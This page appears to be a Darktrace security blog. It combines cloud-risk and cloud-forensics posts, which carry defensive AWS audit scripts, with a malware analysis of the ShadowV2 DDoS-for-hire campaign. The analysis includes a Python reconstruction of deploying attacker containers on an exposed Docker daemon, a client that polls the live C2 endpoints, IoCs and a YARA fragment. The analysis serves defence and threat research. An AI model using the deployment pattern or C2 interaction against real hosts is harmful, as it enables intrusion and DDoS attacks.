Combatting the Top Three Sources of Risk in the Cloud
The biggest sources of risk in the cloud are misconfigurations, IAM failures, and infrastructure that is unprepared to handle cross-domain threats. Learn how AI-powered cloud security tools can help security teams identify and mitigate these risks.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
06 May 2025
With cloud computing, organizations store data like intellectual property, trade secrets, Personally Identifiable Information (PII), proprietary code and statistics, and other sensitive information in the cloud. If this data were accessed by malicious actors, the organization could suffer financial loss, reputational damage, legal liability, and business disruption.
So, as cloud usage continues to grow, the teams in charge of protecting these deployments must understand the associated cybersecurity risks.
What are cloud risks?
Cloud threats come in many forms, and one of the key types is cloud risks. These arise from challenges in implementing and maintaining cloud infrastructure, which can expose the organization to potential damage, loss, and attacks.
There are three major types of cloud risks:
1. Misconfigurations
As organizations struggle with complex cloud environments, misconfiguration is one of the leading causes of cloud security incidents. These risks occur when cloud settings leave gaps between security controls, exposing data and services to unauthorized access. If discovered by a threat actor, a misconfiguration can be exploited to allow infiltration, lateral movement, privilege escalation, and damage.
With the scale and dynamism of cloud infrastructure and the complexity of hybrid and multi-cloud deployments, security teams face a major challenge in achieving the visibility and control required to identify misconfigurations before they are exploited.
Common causes of misconfiguration include skill shortages, outdated practices, and manual workflows. For example, misconfigurations can occur around firewall zones, isolated file systems, and mount systems, which all require specialized skill to set up and diligent monitoring to maintain.
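To make this concrete, here is a minimal sketch (using boto3; the output format is illustrative and pagination is ignored for brevity) of how a team might automatically flag one common misconfiguration, S3 buckets with missing or partially disabled public-access blocks:

```python
# Minimal sketch: flag S3 buckets whose public-access block is missing or
# partially disabled. Assumes AWS credentials are already configured.
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        cfg = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        if not all(cfg.values()):  # any of the four block settings disabled
            print(f"[!] {name}: public access block partially disabled: {cfg}")
    except ClientError as err:
        if err.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
            print(f"[!] {name}: no public access block configured at all")
        else:
            raise
```

Checks like this are exactly what manual workflows miss at cloud scale, which is why automated, continuous evaluation matters.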
2. IAM failures
Identity and Access Management (IAM) has only increased in importance with the rise of cloud computing and remote working. It allows security teams to control which users can and cannot access sensitive data, applications, and other resources.
There are four parts to IAM: authentication, authorization, administration, and auditing and reporting. Within these sit many subcomponents, including but not limited to Single Sign-On (SSO), Two-Factor Authentication (2FA), Multi-Factor Authentication (MFA), and Role-Based Access Control (RBAC).
Security teams are faced with the challenge of allowing enough access for employees, contractors, vendors, and partners to complete their jobs while restricting enough to maintain security. They may struggle to track what users are doing across the cloud, apps, and on-premises servers.
When IAM is misconfigured, it increases the attack surface and can leave accounts with access to resources they do not need to perform their intended roles. This type of risk creates the possibility for threat actors or compromised accounts to gain access to sensitive company data and escalate privileges in cloud environments. It can also allow malicious insiders and users who accidentally violate data protection regulations to cause greater damage.
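As an illustration of what auditing for this looks like, the following hedged sketch (boto3 again; pagination and inline policies are ignored for brevity) surfaces customer-managed policies that allow every action, a common least-privilege violation:

```python
# Minimal sketch: flag customer-managed IAM policies that allow "Action": "*".
import boto3

iam = boto3.client("iam")

for policy in iam.list_policies(Scope="Local")["Policies"]:
    document = iam.get_policy_version(
        PolicyArn=policy["Arn"],
        VersionId=policy["DefaultVersionId"],
    )["PolicyVersion"]["Document"]
    statements = document["Statement"]
    if isinstance(statements, dict):  # a single statement may be unwrapped
        statements = [statements]
    for stmt in statements:
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if stmt.get("Effect") == "Allow" and "*" in actions:
            print(f"[!] {policy['PolicyName']}: allows all actions, review for least privilege")
```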
3. Cross-domain threats
The complexity of hybrid and cloud environments can be exploited by attacks that cross multiple domains, such as traditional network environments, identity systems, SaaS platforms, and cloud environments. These attacks are difficult to detect and mitigate, especially when a security posture is siloed or fragmented.
Some attack types inherently involve multiple domains, like lateral movement and supply chain attacks, which target both on-premises and cloud networks.
Challenges in securing against cross-domain threats often come from a lack of unified visibility. If a security team does not have unified visibility across the organization’s domains, gaps between various infrastructures and the teams that manage them can leave organizations vulnerable.
Adopting AI cybersecurity tools to reduce cloud risk
For security teams to defend against misconfigurations, IAM failures, and cross-domain threats, they require a combination of enhanced visibility into cloud assets and architectures, better automation, and more advanced analytics. These capabilities can be achieved with AI-powered cybersecurity tools.
Such tools use AI and automation to help teams maintain a clear view of all their assets and activities and consistently enforce security policies.
Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that makes cloud security accessible to all security teams and SOCs by using AI to identify and correct misconfigurations and other cloud risks in public, hybrid, and multi-cloud environments.
It provides real-time, dynamic architectural modeling, which gives SecOps and DevOps teams a unified view of cloud infrastructures to enhance collaboration and reveal possible misconfigurations and other cloud risks. It continuously evaluates architecture changes and monitors real-time activity, providing audit-ready traceability and proactive risk management.
Figure 1: Real-time visibility into cloud assets and architectures built from network, configuration, and identity and access roles. In this unified view, Darktrace / CLOUD reveals possible misconfigurations and risk paths.
Darktrace / CLOUD also offers attack path modeling for the cloud. It can identify exposed assets and highlight internal attack paths, giving a dynamic view of the riskiest paths across cloud environments, network environments, and between them – enabling security teams to prioritize based on unique business risk and address gaps to prevent future attacks.
Darktrace’s Self-Learning AI ensures continuous cloud resilience, helping teams move from reactive to proactive defense.
Tackling the 11 Biggest Cloud Threats
Discover how Darktrace / CLOUD uses AI to help security teams protect against the top cloud risks and most pressing attack types in the white paper.
Cloud has changed everything, but investigations haven’t kept up. With breaches hitting cloud data and attackers moving faster than ever, legacy forensics are too slow, too manual, and too fragmented. It’s time for a cloud-first approach: automated, unified, and built for today’s speed of attack.
How Organizations are Addressing Cloud Investigation and Response
The importance of cloud investigation and incident response is compounded by an expanded attack surface in the cloud, a lack of advanced tooling to upskill teams, and increasing regulatory and compliance pressure. This blog dives into these challenges and explores potential solutions for security teams attempting to secure their cloud environments.
Cloud adoption has revolutionized how businesses operate, offering speed, scalability, and flexibility. But for security teams, this transformation has introduced a new set of challenges, especially when it comes to incident response (IR) and forensic investigations.
Cloud-related breaches are skyrocketing: 82% of breaches now involve cloud-stored data (IBM Cost of a Data Breach, 2023). Yet incidents often go unnoticed for days. According to Cybersecurity Insiders' Cloud Security Report 2025, 65% of organizations experienced a cloud-related incident in the past year, but only 9% detected it within the first hour and 62% took more than 24 hours to remediate it.
Despite the shift to cloud, many investigation practices remain rooted in legacy on-prem approaches. According to a recent report, 65% of organizations spend approximately 3-5 days longer investigating an incident in the cloud than on premises.
Cloud investigations must evolve, or risk falling behind attackers who are already exploiting the cloud’s speed and complexity.
4 Reasons Cloud Investigations Are Broken
The cloud’s dynamic nature – with its ephemeral workloads and distributed architecture – has outpaced traditional incident response methods. What worked in static, on-prem environments simply doesn’t translate.
Here’s why:
Ephemeral workloads: Containers and serverless functions can spin up and vanish in minutes. Attackers know this as well – they're exploiting short-lived assets for "hit-and-run" attacks, leaving almost no forensic footprint. If you're relying on scheduled scans or manual evidence collection, you're already too late.
Fragmented tooling: Each cloud provider has its own logs, APIs, and investigation workflows. In addition, not all logs are enabled by default, cloud providers typically limit the scope of their logs (both in what they collect and how long they retain it), and some logs are only available through undocumented APIs. This creates siloed views of attacker activity, making it difficult to piece together a coherent timeline (a sketch of this kind of timeline-stitching follows the list). Now layer in SaaS apps, Kubernetes clusters, and shadow IT, and suddenly you're stitching together 20+ tools just to find out what happened. Analysts call it the 'swivel-chair Olympics,' and it's burning hours they don't have.
SOC overload: Analysts spend the bulk of their time manually gathering evidence and correlating logs rather than responding to threats. This slows down investigations and increases burnout. SOC teams are drowning in noise; they receive thousands of alerts a day, the majority of which never get touched. False positives eat hundreds of hours a month, and burnout is rife as a result.
Cost of delay: The longer an investigation takes, the higher its cost. Breaches contained in under 200 days save an average of over $1M compared to those that linger (IBM Cost of a Data Breach 2025).
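As a sketch of what timeline-stitching involves, the following normalizes events from two providers into one sortable view. The record shapes are deliberately simplified stand-ins for real CloudTrail and Azure Activity Log exports, and the unified field names are our own convention:

```python
# Hypothetical sketch: merge simplified AWS and Azure log records into one timeline.
from dataclasses import dataclass
from datetime import datetime

@dataclass
class UnifiedEvent:
    timestamp: datetime
    provider: str
    actor: str
    action: str

def from_cloudtrail(record: dict) -> UnifiedEvent:
    # CloudTrail timestamps are ISO 8601 with a trailing "Z".
    return UnifiedEvent(
        timestamp=datetime.fromisoformat(record["eventTime"].replace("Z", "+00:00")),
        provider="aws",
        actor=record.get("userIdentity", {}).get("arn", "unknown"),
        action=record["eventName"],
    )

def from_azure_activity(record: dict) -> UnifiedEvent:
    return UnifiedEvent(
        timestamp=datetime.fromisoformat(record["eventTimestamp"]),
        provider="azure",
        actor=record.get("caller", "unknown"),
        action=record["operationName"],
    )

# Simplified sample records standing in for real log exports.
aws_records = [{"eventTime": "2025-05-06T10:15:00Z",
                "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
                "eventName": "GetObject"}]
azure_records = [{"eventTimestamp": "2025-05-06T10:14:30+00:00",
                  "caller": "dev@example.com",
                  "operationName": "Microsoft.Storage/storageAccounts/read"}]

timeline = sorted(
    [from_cloudtrail(r) for r in aws_records]
    + [from_azure_activity(r) for r in azure_records],
    key=lambda e: e.timestamp,
)
for event in timeline:
    print(event.timestamp.isoformat(), event.provider, event.actor, event.action)
```

Real deployments have to do this across dozens of log sources with inconsistent retention and coverage, which is why manual stitching does not scale.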
These challenges create a dangerous gap for threat actors to exploit. By the time evidence is collected, attackers may have already accessed or exfiltrated data, or entrenched themselves deeper into your environment.
What’s Needed: A New Approach to Cloud Investigations
It’s time to ditch the manual, reactive grind and embrace investigations that are automated, proactive, and built for the world you actually defend. Here’s what the next generation of cloud forensics must deliver:
Automated evidence acquisition: Capture forensic-level data the moment a threat is detected, before assets disappear (see the sketch after this list).
Unified multi-cloud visibility: Stitch together logs, timelines, and context across AWS, Azure, GCP, and hybrid environments into a single unified view of the investigation.
Accelerated investigation workflows: Reduce time-to-insight from hours or days to minutes with automated analysis of forensic data, enabling faster containment and recovery.
Empowered SOC teams: Fully contextualized data and collaboration workflows between teams in the SOC ensure seamless handover, freeing analysts from manual collection tasks so they can focus on what matters: analysis and response.
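As a sketch of the first capability, the snippet below (AWS-specific and purely illustrative; the detection pipeline that would invoke it is assumed) snapshots every EBS volume attached to a suspect EC2 instance the moment an alert fires, preserving evidence before the workload disappears:

```python
# Hypothetical sketch: preserve evidence from a suspect EC2 instance on alert.
import boto3

ec2 = boto3.client("ec2")

def preserve_evidence(instance_id: str) -> list[str]:
    """Snapshot every EBS volume attached to the given instance."""
    snapshot_ids = []
    reservations = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"]
    for reservation in reservations:
        for instance in reservation["Instances"]:
            for mapping in instance.get("BlockDeviceMappings", []):
                snap = ec2.create_snapshot(
                    VolumeId=mapping["Ebs"]["VolumeId"],
                    Description=f"IR evidence for {instance_id}",
                    TagSpecifications=[{
                        "ResourceType": "snapshot",
                        "Tags": [{"Key": "case", "Value": instance_id}],
                    }],
                )
                snapshot_ids.append(snap["SnapshotId"])
    return snapshot_ids

# Example: called by a detection hook (hypothetical instance ID).
# preserve_evidence("i-0123456789abcdef0")
```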
Attackers are already leveraging the cloud’s agility. Defenders must do the same — adopting solutions that match the speed and scale of modern infrastructure.
Cloud Changed Everything. It’s Time to Change Investigations.
The cloud fundamentally reshaped how businesses operate. It’s time for security teams to rethink how they investigate threats.
Forensics can no longer be slow, manual, and reactive. It must be instant, automated, and cloud-first — designed to meet the demands of ephemeral infrastructure and multi-cloud complexity.
The future of incident response isn’t just faster. It’s smarter, more scalable, and built for the environments we defend today, not those of ten years ago.
Darktrace's latest investigation uncovered a novel campaign that blends traditional malware with modern DevOps technology.
At the center of this campaign is a Python-based command-and-control (C2) framework hosted on GitHub CodeSpaces. The campaign also utilizes a Python-based spreader with a multi-stage Docker deployment as the initial access vector.
The campaign further makes use of a Go-based Remote Access Trojan (RAT) that implements a RESTful registration and polling mechanism, enabling command execution and communication with its operators.
ShadowV2 attack techniques
What sets this campaign apart is the sophistication of its attack toolkit.
The threat actors employ advanced methods such as HTTP/2 rapid reset, a Cloudflare under attack mode (UAM) bypass, and large-scale HTTP floods, demonstrating a capability to combine distributed denial-of-service (DDoS) techniques with targeted exploitation.
With the inclusion of an OpenAPI specification implemented with FastAPI and Pydantic, plus a fully developed login panel and operator interface, the infrastructure resembles a "DDoS-as-a-service" platform rather than a traditional botnet, showing the extent to which modern malware increasingly mirrors legitimate cloud-native applications in both design and usability.
Analysis of a ShadowV2 attack
Initial access
The initial compromise originates from a Python script hosted on GitHub CodeSpaces. This can be inferred from the observed headers:
User-Agent: docker-sdk-python/7.1.0
X-Meta-Source-Client: github/codespaces
The user agent shows that the attacker is using the Python Docker SDK, a library for Python programs that allows them to interact with Docker to create containers. The X-Meta-Source-Client appears to have been injected by GitHub into the request to allow for attribution, although there is no documentation online about this header.
The IP the connections originate from is 23.97.62[.]139, which is a Microsoft IP based in Singapore. This aligns with expectations as GitHub is owned by Microsoft.
This campaign targets exposed Docker daemons, specifically those running on AWS EC2. Darktrace runs a number of honeypots across multiple cloud providers and has only observed attacks against honeypots running on AWS EC2. By default, Docker is not accessible from the Internet; however, it can be configured to allow external access, which can be useful for managing complex deployments where remote access to the Docker API is needed.
Typically, most campaigns targeting Docker will either take an existing image from Docker Hub and deploy their tools within it, or upload their own pre-prepared image to deploy. This campaign works slightly differently; it first spawns a generic “setup” container and installs a number of tools within it. This container is then imaged and deployed as a live container with the malware arguments passed in via environmental variables.
Figure 1: Attacker creates a blank container from an Ubuntu image.
Figure 2: Attacker sets up their tools for the attack.
Figure 3: Attacker deploys a new container using the image from the setup container.
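The flow in Figures 1-3 can be reconstructed, in hedged form, with the same Python Docker SDK identified by the User-Agent above. The daemon address, setup command, image name, and environment values below are placeholders rather than observed values:

```python
# Hedged reconstruction of the setup-container pattern (placeholders throughout).
import docker

# Connect to an exposed Docker daemon (placeholder address).
client = docker.DockerClient(base_url="tcp://victim.example:2375")

# 1. Spawn a generic "setup" container from a stock Ubuntu image.
setup = client.containers.run("ubuntu:latest", command="sleep infinity", detach=True)

# 2. Install tooling inside it (placeholder install command).
setup.exec_run(["sh", "-c", "apt-get update && apt-get install -y python3"])

# 3. Image the setup container...
image = setup.commit(repository="deployment", tag="latest")

# 4. ...then deploy it live, passing the malware's arguments via environment variables.
client.containers.run(
    image.id,
    detach=True,
    environment={"MASTER_ADDR": "<c2-address>", "VPS_NAME": "<victim-name>"},
)
```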
It is unclear why the attackers chose this approach; one possibility is that the actor is attempting to avoid inadvertently leaving forensic artifacts by performing the build on the victim machine, rather than building the image themselves and uploading it.
Malware analysis
The Docker container acts as a wrapper around a single binary, dropped in /app/deployment. This is an ELF binary written in Go, a popular choice for modern malware. Helpfully, the binary is unstripped, making analysis significantly easier.
The current version of the malware has not been reported by OSINT providers such as VirusTotal. Using the domain name from the MASTER_ADDR variable and other IoCs, we were able to locate two older versions of the malware that were submitted to VirusTotal on June 25 and July 30 respectively [1] [2]. Neither had any detections, and each was submitted only once via the web portal, from the US and Canada respectively. Darktrace first observed the attack against its honeypot on June 24, so it could be a victim of this campaign submitting the malware to VirusTotal. Given how close this is to the start of the attacks, it could also be the attacker testing for detections; however, it is not possible to know for certain.
The malware begins by phoning home, using the MASTER_ADDR and VPS_NAME identifiers passed in from the Docker run environmental variables. In addition, the malware derives a unique VPS_ID, which is the VPS_NAME concatenated with the current unix timestamp. The VPS_ID is used for all communications with the C2 server as the identifier for the specific implant. If the malware is restarted, or the victim is re-infected, the C2 server will inform the implant of its original VPS_ID to ensure continuity.
Figure 4: Snippet that performs the registration by sending a POST request to the C2 API with a JSON structure.
From there, the malware then spawns two main loops that will remain active for the lifetime of the implant. Every second, it sends a heartbeat to the C2 by sending the VPS_ID to hxxps://shadow.aurozacloud[.]xyz/api/vps/heartbeat via POST request. Every 5 seconds, it retrieves hxxps://shadow.aurozacloud[.]xyz/api/vps/poll/<VPS ID> via a GET request to poll for new commands.
Figure 5: The poll mechanism.
At this stage, Darktrace security researchers wrote a custom client, running on the server infected by the attacker, that mimicked the implant. The goal was to intercept commands from the C2. Through this client, the C2 was observed initiating an attack against chache08[.]werkecdn[.]me using a 120-thread HTTP/2 rapid reset attack. This site appears to be hosted on an Amsterdam VPS provided by FDCServers, a server hosting company. It was not possible to identify what normally runs on this site, as it returns a 403 Forbidden error when visited.
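A minimal sketch of such a mimic client, based on the heartbeat and poll endpoints described above, might look like the following. The registration path and JSON field names are our assumptions, and the C2 URL is left defanged so the script will not connect as written:

```python
# Hedged sketch of an implant-mimicking research client (observe, never execute).
import time
import requests

C2 = "hxxps://shadow.aurozacloud[.]xyz"  # defanged on purpose; will not resolve
VPS_ID = f"research-node-{int(time.time())}"  # VPS_NAME + Unix timestamp

# Register with the C2 (endpoint path and payload fields are assumptions).
requests.post(f"{C2}/api/vps/register", json={"vps_id": VPS_ID})

tick = 0
while True:
    # Heartbeat every second, as the real implant does.
    requests.post(f"{C2}/api/vps/heartbeat", json={"vps_id": VPS_ID})
    if tick % 5 == 0:  # poll for commands every 5 seconds
        command = requests.get(f"{C2}/api/vps/poll/{VPS_ID}").json()
        if command:
            print("intercepted command:", command)  # log it; never act on it
    tick += 1
    time.sleep(1)
```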
Darktrace's code analysis found that the returned commands contain the following fields (modeled in the sketch after this list):
Method (e.g. GET, POST)
A unique ID for the attack
A URL endpoint used to report attack statistics
The target URL & port
The duration of the attack
The number of threads to use
An optional proxy to send HTTP requests through
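Modeled as a simple data structure (the field names are our own, mirroring the list above):

```python
# Sketch of the command structure recovered from code analysis.
from dataclasses import dataclass
from typing import Optional

@dataclass
class AttackCommand:
    method: str                   # e.g. GET, POST
    attack_id: str                # unique ID for the attack
    stats_url: str                # endpoint used to report attack statistics
    target: str                   # target URL and port
    duration_seconds: int         # duration of the attack
    threads: int                  # number of threads to use
    proxy: Optional[str] = None   # optional proxy to route HTTP requests through
```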
The malware then spins up several threads, each running a configurable number of HTTP clients using Valyala’s fasthttp library, an open source Go library for making high-performance HTTP requests. After this is complete, it uses these clients to perform an HTTP flood attack against the target.
Figure 6: A snippet showing the fasthttp client creation loop, as well as a function to report the worker count back to the C2.
In addition, the malware features several flags that enable different bypass mechanisms to augment its attacks:
WordPress bypass (does not appear to be implemented - the flag is not used anywhere)
Random query strings appended to the URL
Spoofed forwarding headers with random IP addresses
Cloudflare under-attack-mode (UAM) bypass
HTTP/2 rapid reset
The most interesting of these is the Cloudflare UAM bypass mechanism. When this is enabled, the malware will attempt to use a bundled ChromeDP binary to solve the Cloudflare JavaScript challenge that is presented to new visitors. If this succeeds, the clearance cookie obtained is then included in subsequent requests. This is unlikely to work in most cases as headless Chrome browsers are often flagged, and a regular CAPTCHA is instead served.
Figure 7: The UAM bypass success snippet.
Additionally, the malware has a flag to enable an HTTP/2 rapid reset attack mode instead of a regular HTTP flood. In HTTP/2, a client can create thousands of requests within a single connection using multiplexing, allowing sites to load faster. The number of concurrent request streams per connection is capped, however, so in a rapid reset attack many requests are made and then immediately cancelled to free up slots for new ones. This allows a single client to execute vastly more requests per second and consume more server resources than it otherwise could, enabling more effective denial-of-service (DoS) attacks.
Figure 8: The HTTP2 rapid reset snippet from the main attack function.
API/C2 analysis
As mentioned throughout the malware analysis section, the malware communicates with a C2 server using HTTP. The server is behind Cloudflare, which obscures its hosting location and prevents analysis. However, based on analysis of the spreader, it's likely running on GitHub CodeSpaces.
When sending a malformed request to the API, an error generated by the Pydantic library is returned:
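The exact response is not reproduced here, but FastAPI's Pydantic-generated validation errors follow a distinctive shape. An illustrative example (the field name is hypothetical):

```json
{
  "detail": [
    {
      "loc": ["body", "vps_id"],
      "msg": "field required",
      "type": "value_error.missing"
    }
  ]
}
```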
This shows they are using Python for the API, which is the same language that the spreader is written in.
One of the larger frameworks built on Pydantic is FastAPI, which also ships with Swagger. The malware author left this publicly exposed, and Darktrace's researchers were able to obtain a copy of their API documentation. The author appears to have noticed this, however, as subsequent attempts to access it now return an HTTP 404 Not Found error.
Figure 9: Swagger UI view based on the obtained OpenAPI spec.
This is useful to have as it shows all the API endpoints, including the exact fields they take and return, along with comments on each endpoint written by the attacker themselves.
It is very likely a DDoS-for-hire platform (or at the very least, designed for multi-tenant use) based on the extensive user API, which features authentication, distinctions between privilege levels (admin vs. user), and limitations on the types of attack a user can execute. The screenshot below shows the admin-only user create endpoint, with the default limits.
Figure 10: The admin-only user create endpoint.
The endpoint used to launch attacks can also be seen, and it lines up with the options previously observed in the malware itself. Interestingly, this endpoint requires a list of zombie systems to launch the attack from. This is unusual, as most DDoS-for-hire services decide this internally or simply launch the attack from every infected host (zombie). No endpoints that return a list of zombies were found; however, it is possible one exists, as the return types are not documented for all the API endpoints.
Figure 11: The attack start endpoint.
There is also an endpoint to manage a blacklist of hosts that cannot be attacked. This could be to stop users from launching attacks against sites operated by the malware author; however, it is also possible the author is attempting to sell protection to victims, which has been seen previously with other DDoS-for-hire services.
Figure 12: Blacklist endpoints.
Attempting to visit shadow[.]aurozacloud[.]xyz results in a seizure notice. It is most likely fake, as the same backend is still in use and all of the API endpoints continue to work. Appending /login to the path instead brings up the login screen for the DDoS platform. It describes itself as an "advanced attack platform", which highlights that it is almost certainly a DDoS-for-hire service. The UI is high quality, built with Tailwind, and even features animations.
Figure 13: The fake seizure notice.
Figure 14: The login UI at /login.
Conclusion
By leveraging containerization, an extensive API, and a full user interface, this campaign shows the continued development of cybercrime-as-a-service. The ability to deliver modular functionality through a Go-based RAT and expose a structured API for operator interaction highlights how sophisticated some threat actors are.
For defenders, the implications are significant. Effective defense requires deep visibility into containerized environments, continuous monitoring of cloud workloads, and behavioral analytics capable of identifying anomalous API usage and container orchestration patterns. The presence of a DDoS-as-a-service panel with full user functionality further emphasizes the need for defenders to think of these campaigns not as isolated tools but as evolving platforms.
[Fragment of a YARA detection rule; only the closing condition survives: uint16(0) == 0x457f (the ELF magic bytes) combined with at least two $string* matches, two $symbol* matches, or any $code* match.]